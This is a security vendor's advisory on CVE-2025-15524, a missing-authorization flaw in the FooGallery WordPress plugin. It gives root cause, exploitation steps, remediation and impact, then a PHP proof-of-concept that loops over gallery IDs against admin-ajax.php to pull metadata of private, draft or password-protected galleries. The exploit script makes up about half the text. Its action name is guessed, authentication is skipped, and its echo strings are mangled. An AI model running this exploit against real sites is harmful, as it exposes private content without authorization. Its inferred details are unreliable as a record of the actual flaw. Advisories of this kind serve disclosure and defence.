Atomic Edge analysis of CVE-2025-15524 (metadata-based):
This vulnerability is a Missing Authorization flaw in the Gallery by FooGallery WordPress plugin, affecting versions up to and including 3.1.9. The flaw allows authenticated users with Subscriber-level permissions or higher to retrieve metadata for galleries, including those with private, draft, or password-protected status, by enumerating gallery IDs.
Atomic Edge research identifies the root cause as a missing capability check on the `ajax_get_gallery_info()` function. This function is likely registered as a WordPress AJAX handler for both privileged and unprivileged users via the `wp_ajax_nopriv_` hook, or it lacks an internal authorization check. The CWE-862 classification confirms the absence of a proper authorization mechanism. These conclusions are inferred from the CVE description and CWE classification, as no source code diff is available for confirmation.
Exploitation requires an authenticated attacker with a Subscriber account. The attacker sends a POST request to the standard WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must contain an `action` parameter set to the vulnerable AJAX hook. Based on common WordPress plugin naming conventions and the function name, Atomic Edge analysis infers the action is likely `foogallery_get_gallery_info` or a similar derivative. The attacker supplies a `gallery_id` parameter to enumerate gallery metadata, which the vulnerable function returns without verifying the user’s right to view that specific gallery.
Remediation requires adding a proper capability check within the `ajax_get_gallery_info()` function before processing the request. The fix should verify the user has at least the `read_private_posts` capability or a plugin-specific equivalent. The AJAX handler should also be deregistered from the `wp_ajax_nopriv_` hook if it was incorrectly made available to unauthenticated users. The patched version 3.1.10 implements these authorization controls.
The impact is unauthorized information disclosure. Attackers can enumerate the names, image counts, and thumbnail URLs of galleries intended to be private, in draft status, or password-protected. This exposure violates confidentiality and could aid in further targeted attacks by revealing the existence and structure of non-public content. The CVSS:3.1 vector scores a 4.3 (Medium) due to the low attack complexity, low privilege requirement, and low impact on confidentiality without integrity or availability loss.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-15524 - Gallery by FooGallery <= 3.1.9 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Gallery Metadata Exposure
<?php
$target_url = 'https://example.com/wp-admin/admin-ajax.php';
$username = 'subscriber';
$password = 'password';
// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
// Step 1: Authenticate to WordPress (simplified - a real PoC would need nonce from login form)
// This PoC assumes valid credentials are already known and the session is established.
// In practice, you would first send a POST to wp-login.php with log/pwd and retrieve cookies.
// Step 2: Exploit the missing authorization to enumerate gallery info.
// The vulnerable AJAX action is inferred from the function name ajax_get_gallery_info().
// Common pattern: plugin prefix 'foogallery' + '_' + 'get_gallery_info'.
$vulnerable_action = 'foogallery_get_gallery_info';
// Loop through potential gallery IDs
for ($gallery_id = 1; $gallery_id <= 10; $gallery_id++) {
$post_fields = [
'action' => $vulnerable_action,
'gallery_id' => $gallery_id
];
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "Testing Gallery ID: $gallery_idn";
echo "HTTP Code: $http_coden";
echo "Response: $responsen";
echo str_repeat('-', 50) . "n";
// Optional: parse JSON response if successful
if ($http_code == 200 && !empty($response)) {
$data = json_decode($response, true);
if (json_last_error() === JSON_ERROR_NONE && !empty($data)) {
echo "SUCCESS - Retrieved metadata for gallery $gallery_id:n";
print_r($data);
echo "n";
}
}
}
curl_close($ch);
?>
